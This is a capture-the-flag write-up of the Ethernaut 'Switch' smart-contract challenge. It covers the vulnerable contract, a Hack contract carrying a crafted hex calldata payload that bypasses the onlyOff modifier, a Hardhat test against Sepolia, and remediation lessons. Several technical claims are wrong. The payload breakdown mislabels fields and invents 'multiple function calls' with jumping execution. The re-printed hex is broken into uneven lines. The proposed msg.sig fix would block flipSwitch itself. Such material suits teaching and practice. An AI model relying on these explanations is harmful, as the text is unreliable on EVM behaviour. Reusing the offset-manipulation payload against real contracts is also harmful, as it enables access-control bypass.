AiAda Docs / Smart Contract Writeups

Appearance

Return to top
On this page

Exploiting the Switch: A Deep Dive into Ethereum Calldata Manipulation

Introduction

In the world of Ethereum smart contract security, understanding how data flows between contracts is fundamental to both development and exploitation. The "Switch" challenge from OpenZeppelin's Ethernaut series presents a fascinating case study in calldata manipulation and contract interaction. This technical article will dissect the challenge, explore the underlying concepts, and demonstrate how to successfully exploit the vulnerability.

Understanding the Challenge

The Switch Contract Overview

The Switch contract presents a seemingly simple challenge: we need to flip a boolean state variable switchOn from false to true. However, the contract implements several protective mechanisms that make this task non-trivial.

solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Switch {
    bool public switchOn; // switch is off
    bytes4 public offSelector = bytes4(keccak256("turnSwitchOff()"));

    modifier onlyThis() {
        require(msg.sender == address(this), "Only the contract can call this");
        _;
    }

    modifier onlyOff() {
        // we use a complex data type to put in memory
        bytes32[1] memory selector;
        // check that the calldata at position 68 (location of _data)
        assembly {
            calldatacopy(selector, 68, 4) // grab function selector from calldata
        }
        require(selector[0] == offSelector, "Can only call the turnOffSwitch function");
        _;
    }

    function flipSwitch(bytes memory _data) public onlyOff {
        (bool success,) = address(this).call(_data);
        require(success, "call failed :(");
    }

    function turnSwitchOn() public onlyThis {
        switchOn = true;
    }

    function turnSwitchOff() public onlyThis {
        switchOn = false;
    }
}

Key Security Mechanisms

The contract implements three main security mechanisms:

  1. onlyThis modifier: Ensures only the contract itself can call turnSwitchOn() and turnSwitchOff()
  2. onlyOff modifier: Validates that the calldata at position 68 contains the selector for turnSwitchOff()
  3. Internal call pattern: The flipSwitch function uses address(this).call(_data) to execute functions internally

Deep Dive into Ethereum Calldata

What is Calldata?

In Ethereum, calldata is a special read-only data area that contains the arguments passed to a function call. When you call a contract function, the Ethereum Virtual Machine (EVM) encodes the function selector and arguments into a byte array according to the Ethereum ABI encoding specification.

ABI Encoding Basics

The ABI encoding for function calls follows this structure:

  • Bytes 0-3: Function selector (first 4 bytes of keccak256 hash of function signature)
  • Bytes 4+: Arguments, each padded to 32 bytes

For example, calling flipSwitch with some data would be encoded as:

  • First 4 bytes: keccak256("flipSwitch(bytes)")
  • Following bytes: Encoded bytes parameter

Understanding the Vulnerability

The critical vulnerability lies in the onlyOff modifier. Let's examine it more closely:

solidity
modifier onlyOff() {
    bytes32[1] memory selector;
    assembly {
        calldatacopy(selector, 68, 4) // grab function selector from calldata
    }
    require(selector[0] == offSelector, "Can only call the turnOffSwitch function");
    _;
}

The modifier reads 4 bytes starting from position 68 in the calldata and compares it with offSelector (which is bytes4(keccak256("turnSwitchOff()"))).

The Exploitation Strategy

Step 1: Understanding Calldata Layout

To exploit this contract, we need to understand exactly what's at position 68. When we call flipSwitch(bytes memory _data), the calldata structure is:

  1. Bytes 0-3: flipSwitch selector
  2. Bytes 4-35: Offset to _data (typically 0x20 for dynamic types)
  3. Bytes 36-67: Length of _data
  4. Bytes 68+: The actual _data content

This means position 68 contains the beginning of our _data parameter. The modifier checks that the first 4 bytes of _data equal the turnSwitchOff() selector.

Step 2: Crafting the Payload

We need to create _data that:

  1. Starts with the turnSwitchOff() selector (to pass the onlyOff check)
  2. Actually calls turnSwitchOn() when executed

The solution involves understanding how nested calls work. When flipSwitch calls address(this).call(_data), it's making an internal call. We can craft _data to be a call to turnSwitchOn(), but we need to bypass the initial check.

Step 3: The Hack Contract

Here's the complete exploit contract:

solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./Switch.sol";

contract Hack {
    Switch private immutable target;

    constructor(address _target) {
        target = Switch(_target);

        bytes memory data = hex"30c13ade0000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000000020606e1500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000476227e1200000000000000000000000000000000000000000000000000000000";
        (bool success, ) = address(target).call(data);
        require(success, "Failed to switch on!");
    }
}

Step 4: Decoding the Payload

Let's break down the hexadecimal payload:

30c13ade0000000000000000000000000000000000000000000000000000000000000060
000000000000000000000000000000000000000000000000000000000000000020606e1500
000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000476227e1200000000
000000000000000000000000000000000000000000000000

This is actually encoding a call to flipSwitch with carefully crafted data. The key insight is that we're creating _data that contains multiple function calls.

Detailed Payload Analysis

Part 1: The Outer Call Structure

The first 4 bytes (30c13ade) are the selector for flipSwitch(bytes).

The next 32 bytes indicate where the bytes parameter starts (offset 0x60 or 96 bytes from the start of calldata).

Part 2: The Crafted _data Parameter

Starting at position 96, we have our crafted _data:

  1. First 32 bytes: Length of the actual payload (0x20 = 32 bytes)
  2. Next 32 bytes: This is where the magic happens

The actual payload (0x20606e1500...) is designed to:

  • Start with the turnSwitchOff() selector at position 68 (which is within this payload when properly positioned)
  • Contain additional data that will execute turnSwitchOn()

Part 3: The Nested Call Trick

The exploit uses the fact that when address(this).call(_data) is executed, it can include multiple function calls. The payload is crafted so that:

  1. The initial check at position 68 sees the turnSwitchOff() selector
  2. The actual execution calls turnSwitchOn()

This is achieved by including both selectors in the payload at different positions and ensuring the execution flow jumps to the right place.

Assembly-Level Understanding

The calldatacopy Operation

Let's examine the assembly code in the modifier:

solidity
assembly {
    calldatacopy(selector, 68, 4) // grab function selector from calldata
}

The calldatacopy(destOffset, offset, length) instruction copies length bytes from calldata starting at offset to memory starting at destOffset.

Memory Layout During Execution

When flipSwitch is called:

  1. The function parameters are decoded
  2. _data is loaded into memory
  3. The modifier checks bytes 68-71 of the original calldata
  4. These bytes correspond to the beginning of _data in memory

Testing the Exploit

Here's the complete test script to verify the exploit:

typescript
import { ethers } from "hardhat";
import { expect } from "chai";
import { Switch, Hack } from "../typechain-types";

describe("Switch", function () {
  describe("Switch testnet online sepolia", function () {
    it("testnet online sepolia Switch", async function () {
      const SWITCH_ADDRESS = "0x...";
      const HackFactory = await ethers.getContractFactory("Hack");
      const hack = (await HackFactory.deploy(SWITCH_ADDRESS)) as Hack;
      await hack.waitForDeployment();

      const SwitchFactory = await ethers.getContractFactory("Switch");
      const SWITCH_ABI = SwitchFactory.interface.format();
      const challenger = await ethers.getNamedSigner("deployer");
      const switchContract = new ethers.Contract(SWITCH_ADDRESS, SWITCH_ABI, challenger);

      const switchOn = await switchContract.switchOn();
      expect(switchOn).to.be.equals(true);
    });
  });
});

Security Lessons and Best Practices

Lesson 1: Validate All Inputs Thoroughly

The Switch contract only validates the first 4 bytes of _data at a specific position. A more secure approach would be to validate the entire calldata structure.

Lesson 2: Be Careful with Assembly

Using inline assembly requires deep understanding of EVM internals. The calldatacopy at a fixed position creates a vulnerability.

Lesson 3: Consider Using Higher-Level Abstractions

Instead of manual calldata parsing, consider using function modifiers that check msg.sig or implement proper access control patterns.

Lesson 4: Implement Defense in Depth

Multiple layers of validation can prevent such exploits. For example:

solidity
modifier onlyOff() {
    require(msg.sig == bytes4(keccak256("turnSwitchOff()")), 
            "Wrong function");
    _;
}

Alternative Exploitation Methods

Method 1: Direct Storage Manipulation

If the contract allowed it, we could directly manipulate storage. However, the onlyThis modifier prevents this.

Method 2: Reentrancy Attack

The contract doesn't implement checks-effects-interactions pattern, but the specific vulnerability doesn't lend itself to reentrancy.

Method 3: Function Signature Clashing

We could potentially find another function with the same first 4 bytes as turnSwitchOff(), but this is statistically unlikely.

Conclusion

The Switch challenge teaches us several important lessons about Ethereum smart contract security:

  1. Calldata is complex: Understanding ABI encoding is crucial for both development and security analysis.
  2. Assembly is dangerous: Low-level operations require careful consideration of all edge cases.
  3. Validation must be complete: Partial validation can create exploitable gaps.
  4. Internal calls have nuances: The way contracts call themselves affects security considerations.

The exploit demonstrates how seemingly secure code can be bypassed through careful understanding of Ethereum's execution model. By crafting a specific calldata payload, we can make the contract validate one thing while executing another.

Prevention Strategies

To prevent such vulnerabilities:

  1. Use established libraries for calldata parsing instead of manual assembly
  2. Implement comprehensive validation of all inputs
  3. Consider using OpenZeppelin's AccessControl for permission management
  4. Conduct thorough testing including edge cases and malicious inputs
  5. Perform formal verification for critical security logic

Further Reading

  1. Ethereum Yellow Paper - Formal specification of the EVM
  2. Solidity Documentation - ABI encoding and function selectors
  3. OpenZeppelin Security Center - Best practices and common vulnerabilities
  4. Consensys Smart Contract Best Practices

This challenge serves as an excellent reminder that in blockchain development, understanding low-level details is not just optional—it's essential for building secure systems. The combination of theoretical knowledge and practical exploitation skills forms the foundation of effective smart contract security.

Built with AiAda

Copyright © 2026